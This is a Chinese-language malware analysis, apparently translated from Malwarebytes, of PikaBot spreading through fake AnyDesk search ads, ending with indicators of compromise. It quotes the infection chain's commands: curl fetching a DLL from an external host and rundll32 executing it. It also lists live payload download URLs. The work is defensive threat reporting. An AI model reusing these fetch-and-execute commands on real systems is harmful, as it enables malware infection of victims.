深度分析PikaBot如何通过恶意搜索广告实现大规模传播和入侵感染
写在前面的话
在过去的2023年里,Malwarebytes Labs的研究人员发现通过恶意广告实现网络攻击的活动数量有所增加,特别是通过搜索引擎投放的针对企业组织的恶意广告行为。如果要将社工活动包括进来的话,相当于是基于浏览器的攻击活动数量增加了不少。
网络犯罪分子经常会通过搜索广告来感染新的目标用户,研究人员认为,目前社区或暗网市场中有专门的服务可以帮助恶意软件分发者和网络犯罪组织绕过Google的安全措施并帮助他们建立攻击诱饵基础设施。
在这篇文章中,我们将对一个名为PikaBot的恶意活动进行分析,并提供跟该活动相关的详细信息和入侵威胁指标IoC。这是一个出现于2023年的新型恶意软件家族,PikaBot目前主要通过恶意广告来实现大规模感染和入侵。值得一提的是,PikaBot现在已经成为了网络犯罪组织TA577的首选Payload之一。
PikaBot与恶意垃圾邮件的关联
早在2023年2月份,Unit 42的研究人员就发现并识别了PikaBot的活动,当时的PikaBot主要通过恶意垃圾邮件活动进行传播,并由Matanbuchus恶意软件分发和感染。
继QakBot僵尸网络于2023年8月份退出历史舞台之后,Cofense的研究人员便观察到了同时传播 DarkGate 和 PikaBot 的恶意垃圾邮件活动有所增加。ikaBot的典型分发链通常以包含外部网站链接的电子邮件(劫持线程)作为开端,并诱骗目标用户下载包含恶意JavaScript文件的ZIP压缩文件:
随后,恶意JavaScript文件将会在目标设备上创建一个随机目录结构,并通过curl工具从一个外部网站获取和下载恶意Payload:
"C:\Windows\System32\cmd.exe" /c mkdir C:\Gkooegsglitrg\Dkrogirbksri & curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll
curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll
接下来,该脚本便会通过rundll32来执行Payload(一个DLL文件):
rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter
根据OALbas研究人员的描述,恶意脚本随后便会将PikaBot的核心模块注入到合法的SearchProtocolHost.exe进程中。除此之外,PikaBot的加载器还会通过使用间接系统调用来隐藏其注入行为,以此来增加感染的隐蔽性。
PikaBot正在通过恶意广告进行分发感染
该活动主要针对的是Google搜索中的远程应用程序AnyDesk,研究人员在对PikaBot的分发链进行分析后,发现并识别了该活动最终的Payload就是PikaBot。
除此之外,研究人员还在另外一个冒充AnyDesk品牌的恶意广告中发现了该活动:
点击该恶意广告之后,用户便会被重定向到一个预先设置好的诱饵网站(anadesky[.]ovmv[.]net):
点击下载按钮之后,下载下来的将是一个经过数字签名的MSI安装程序。需要注意的是,当时在分析该Payload时,它在VirusTotal上的检测结果为零。然而,更有趣的地方在于它实现检测绕过所使用的方法:
JoeSandbox的研究人员对PikaBot完整攻击流程的总结如下图所示:
与FakeBat类似的恶意广告活动
一直以来,威胁行为者都在尝试使用合法的广告营销平台和跟踪URL来绕过Google的安全检查,并将目标用户重定向到托管在Cloudflare中的自定义域名:
恶意行为者此时将会通过JavaScript来执行指纹识别,以确定目标用户是否处于虚拟机环境中。检测完成之后,目标用户才会被重定向到主登录页面,即诱饵AnyDesk网站。
有趣的是,当用户单击下载按钮时,会进行第二次指纹识别尝试,这种做法很可能是攻击者需要再次确保下载链接在虚拟化环境中不起作用。在这一个攻击活动中,攻击者托管恶意MSI安装程序时使用的是Dropbox。
研究人员还发现,PikaBot之前的恶意广告攻击链也使用了相同的重定向机制(域名为onelink[.]me)。这些攻击活动当时主要针对的是Zoom和Slack搜索广告,并已上报给了Google:
总结
在此之前,很多恶意软件主要通过浏览器插件漏洞来实现分发。但随着安全漏洞的不断修复,威胁行为者便将注意力转移到了垃圾邮件和恶意广告上。因此,恶意广告变成了另一种强大的传染媒介。
在这篇文章中,我们对PikaBot的恶意活动进行分析,并提供跟该活动相关的详细信息和入侵威胁指标IoC。广大企业组织和个人用户在搜索和点击任何广告内容时,都应该小心谨慎,确保终端用户访问的内容来自可信来源。
入侵威胁指标IoC
恶意域名
anadesky[.]ovmv[.]net
cxtensones[.]top
Dropbox Payload
dropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq
dropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu
dropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj
PikaBot哈希
0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320
PikaBot C2
172[.]232[.]186[.]251
57[.]128[.]83[.]129
57[.]128[.]164[.]11
57[.]128[.]108[.]132
139[.]99[.]222[.]29
172[.]232[.]164[.]77
54[.]37[.]79[.]82
172[.]232[.]162[.]198
57[.]128[.]109[.]221
参考资料
https://twitter.com/Unit42_Intel/status/1623349272061136900
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/
参考链接
https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads
